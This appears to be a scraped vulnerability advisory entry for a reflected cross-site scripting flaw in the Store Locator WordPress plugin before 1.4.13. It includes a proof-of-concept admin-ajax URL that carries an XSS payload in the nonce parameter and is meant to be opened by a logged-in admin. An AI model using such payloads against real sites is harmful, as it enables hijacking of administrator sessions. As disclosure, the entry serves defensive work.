Lucene search

K
wpexploitTnt24WPEX-ID:C9D80AA4-A26D-4B3F-B7BF-9D2FB0560D7B
HistoryAug 10, 2023 - 12:00 a.m.

Store Locator WordPress < 1.4.13 - Reflected XSS

2023-08-1000:00:00
tnt24
30
wordpress
reflected xss
store locator
admin
url
exploit
security

6 Medium

AI Score

Confidence

High

0.0005 Low

EPSS

Percentile

17.0%

Description The plugin does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open the URL below

https://example.com/wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`XSS`>

6 Medium

AI Score

Confidence

High

0.0005 Low

EPSS

Percentile

17.0%

Related for WPEX-ID:C9D80AA4-A26D-4B3F-B7BF-9D2FB0560D7B